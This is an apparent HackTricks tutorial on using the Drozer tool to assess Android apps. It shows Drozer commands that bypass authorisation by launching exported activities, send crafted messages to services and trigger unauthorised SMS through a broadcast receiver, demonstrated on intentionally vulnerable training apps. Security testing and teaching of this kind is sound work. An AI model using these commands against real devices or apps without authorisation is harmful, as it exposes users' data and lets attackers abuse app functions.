HackTricks Press
Search K

Appearance

Drozer Tutorial โ€‹

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

โ›“๏ธ External Link
https://go.intigriti.com/hacktricks

APKs to test โ€‹

Parts of this tutorial were extracted from the Drozer documentation pdf.

Installation โ€‹

Install Drozer Client inside your host. Download it from the latest releases.

bash
pip install drozer-2.4.4-py2-none-any.whl
pip install twisted
pip install service_identity

Download and install drozer APK from the latest releases. At this moment it is this.

bash
adb install drozer.apk

Starting the Server โ€‹

Agent is running on port 31415, we need to port forward to establish the communication between the Drozer Client and Agent, here is the command to do so:

bash
adb forward tcp:31415 tcp:31415

Finally, launch the application and press the bottom "ON"

And connect to it:

bash
drozer console connect

Interesting Commands โ€‹

CommandsDescription
Help MODULEShows help of the selected module
listShows a list of all drozer modules that can be executed in the current session. This hides modules that you donโ€™t have appropriate permissions to run.
shellStart an interactive Linux shell on the device, in the context of the Agent.
cleanRemove temporary files stored by drozer on the Android device.
loadLoad a file containing drozer commands and execute them in sequence.
moduleFind and install additional drozer modules from the Internet.
unsetRemove a named variable that drozer passes to any Linux shells that it spawns.
setStores a value in a variable that will be passed as an environmental variable to any Linux shells spawned by drozer.
shellStart an interactive Linux shell on the device, in the context of the Agent
run MODULEExecute a drozer module
exploitDrozer can create exploits to execute in the decide. drozer exploit list
payloadThe exploits need a payload. drozer payload list

Package โ€‹

Find the name of the package filtering by part of the name:

bash
dz> run app.package.list -f sieve  
com.mwr.example.sieve

Basic Information of the package:

bash
dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory: /data/data/com.mwr.example.sieve
APK Path: /data/app/com.mwr.example.sieve-2.apk
UID: 10056
GID: [1028, 1015, 3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
 - android.permission.READ_EXTERNAL_STORAGE
 - android.permission.WRITE_EXTERNAL_STORAGE
 - android.permission.INTERNET
Defines Permissions:
 - com.mwr.example.sieve.READ_KEYS
 - com.mwr.example.sieve.WRITE_KEYS

Read Manifest:

bash
run app.package.manifest jakhar.aseem.diva

Attack surface of the package:

bash
dz> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
 3 activities exported
 0 broadcast receivers exported
 2 content providers exported
 2 services exported
 is debuggable
  • Activities: Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it.
  • Content providers: Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal).
  • Services:
  • is debuggable: Learn more

Activities โ€‹

An exported activity componentโ€™s โ€œandroid:exportedโ€ value is set to โ€œtrueโ€ in the AndroidManifest.xml file:

markup
<activity android:name="com.my.app.Initial" android:exported="true">
</activity>

List exported activities:

bash
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
 com.mwr.example.sieve.FileSelectActivity
 com.mwr.example.sieve.MainLoginActivity
 com.mwr.example.sieve.PWList

Start activity:

Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it.

bash
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

You can also start an exported activity from adb:

  • PackageName is com.example.demo
  • Exported ActivityName is com.example.test.MainActivity
bash
adb shell am start -n com.example.demo/com.example.test.MainActivity

Content Providers โ€‹

This post was so big to be here so you can access it in its own page here.

Services โ€‹

A exported service is declared inside the Manifest.xml:

markup
<service android:name=".AuthService" android:exported="true" android:process=":remote"/>

Inside the code check for the **handleMessage**function which will receive the message:

List service โ€‹

bash
dz> run app.service.info -a com.mwr.example.sieve 
Package: com.mwr.example.sieve
  com.mwr.example.sieve.AuthService
    Permission: null
  com.mwr.example.sieve.CryptoService
    Permission: null

Interact with a service โ€‹

bash
app.service.send            Send a Message to a service, and display the reply  
app.service.start           Start Service                                       
app.service.stop            Stop Service

Example โ€‹

Take a look to the drozer help for app.service.send:

Note that you will be sending first the data inside "msg.what", then "msg.arg1" and "msg.arg2", you should check inside the code which information is being used and where.
Using the --extra option you can send something interpreted by "msg.replyTo", and using --bundle-as-obj you create and object with the provided details.

In the following example:

  • what == 2354
  • arg1 == 9234
  • arg2 == 1
  • replyTo == object(string com.mwr.example.sieve.PIN 1337)
bash
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj

Broadcast Receivers โ€‹

In the Android basic info section you can see what is a Broadcast Receiver.

After discovering this Broadcast Receivers you should check the code of them. Pay special attention to the onReceive function as it will be handling the messages received.

Detect all broadcast receivers โ€‹

bash
run app.broadcast.info #Detects all

Check broadcast receivers of an app โ€‹

bash
#Check one negative
run app.broadcast.info -a jakhar.aseem.diva
Package: jakhar.aseem.diva
  No matching receivers.

# Check one positive
run app.broadcast.info -a com.google.android.youtube
Package: com.google.android.youtube
  com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver
    Permission: null
  com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver
    Permission: com.google.android.c2dm.permission.SEND
  com.google.android.apps.youtube.app.PackageReplacedReceiver
    Permission: null
  com.google.android.libraries.youtube.account.AccountsChangedReceiver
    Permission: null
  com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver
    Permission: null

Broadcast Interactions โ€‹

bash
app.broadcast.info          Get information about broadcast receivers           
app.broadcast.send          Send broadcast using an intent                      
app.broadcast.sniff         Register a broadcast receiver that can sniff particular intents

Send a message โ€‹

In this example abusing the FourGoats apk Content Provider you can send an arbitrary SMS any non-premium destination without asking the user for permission.

If you read the code, the parameters "phoneNumber" and "message" must be sent to the Content Provider.

bash
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!"

Is debuggeable โ€‹

A prodduction APK should never be debuggeable.
This mean that you can attach java debugger to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them. InfoSec institute has an excellent article on digging deeper when you application is debuggable and injecting runtime code.

When an application is debuggable, it will appear in the Manifest:

xml
<application theme="@2131296387" debuggable="true"

You can find all debuggeable applications with Drozer:

bash
run app.package.debuggable

Tutorials โ€‹

More info โ€‹

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

โ›“๏ธ External Link
https://go.intigriti.com/hacktricks
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: